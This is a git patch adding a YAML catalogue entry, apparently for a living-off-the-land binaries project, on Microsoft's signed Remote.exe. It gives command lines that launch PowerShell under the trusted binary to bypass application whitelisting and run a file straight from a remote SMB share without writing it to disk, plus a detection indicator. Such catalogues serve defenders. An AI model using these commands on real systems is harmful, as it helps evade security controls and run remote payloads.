From 7dab1b916e485bc5e3494dc0cf89f07508f153a9 Mon Sep 17 00:00:00 2001 From: ahmad Date: Wed, 6 Jan 2021 20:48:25 -0500 Subject: [PATCH 1/2] Create remote.yml --- yml/OtherMSBinaries/Remote.yml | 43 ++++++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 yml/OtherMSBinaries/Remote.yml diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml new file mode 100644 index 0000000..9f3b4d3 --- /dev/null +++ b/yml/OtherMSBinaries/Remote.yml @@ -0,0 +1,43 @@ +--- +Name: Remote.exe +Description: Allows you to run command-line programs on remote computers +Author: mr.d0x +Created: 1/6/2021 +Commands: + - Command: Remote.exe /s "powershell.exe" anythinghere + Description: Spawns powershell as a child process of remote.exe + Usecase: Executes a process under a trusted Microsoft signed binary + Category: AWL Bypass + Privileges: User + MitreID: + MitreLink: + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 + - Command: Remote.exe /s "powershell.exe" anythinghere + Description: Spawns powershell as a child process of remote.exe + Usecase: Executes a process under a trusted Microsoft signed binary + Category: Execute + Privileges: User + MitreID: + MitreLink: + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 + - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere + Description: Run a remote file + Usecase: Avoiding any writes to disk + Category: Execute + Privileges: User + MitreID: + MitreLink: + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 +Full_Path: + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe +Code_Sample: + - Code: +Detection: + - IOC: remote.exe spawned +Resources: + - Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/ +Acknowledgement: + - Person: mr.d0x + Handle: '@mrd0x' +--- \ No newline at end of file From 4254927f78d46a84e495966138b4f1ff81c223b6 Mon Sep 17 00:00:00 2001 From: Ahmad AS Date: Wed, 6 Jan 2021 23:31:01 -0500 Subject: [PATCH 2/2] Update Remote.yml --- yml/OtherMSBinaries/Remote.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml index 9f3b4d3..8e7a935 100644 --- a/yml/OtherMSBinaries/Remote.yml +++ b/yml/OtherMSBinaries/Remote.yml @@ -1,6 +1,6 @@ --- Name: Remote.exe -Description: Allows you to run command-line programs on remote computers +Description: Debugging tool included with Windows Debugging Tools Author: mr.d0x Created: 1/6/2021 Commands: @@ -11,7 +11,7 @@ Commands: Privileges: User MitreID: MitreLink: - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 + OperatingSystem: - Command: Remote.exe /s "powershell.exe" anythinghere Description: Spawns powershell as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary @@ -19,15 +19,15 @@ Commands: Privileges: User MitreID: MitreLink: - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 + OperatingSystem: - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere Description: Run a remote file - Usecase: Avoiding any writes to disk + Usecase: Executing a remote binary without saving file to disk Category: Execute Privileges: User MitreID: MitreLink: - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 + OperatingSystem: Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe @@ -40,4 +40,4 @@ Resources: Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ---- \ No newline at end of file +---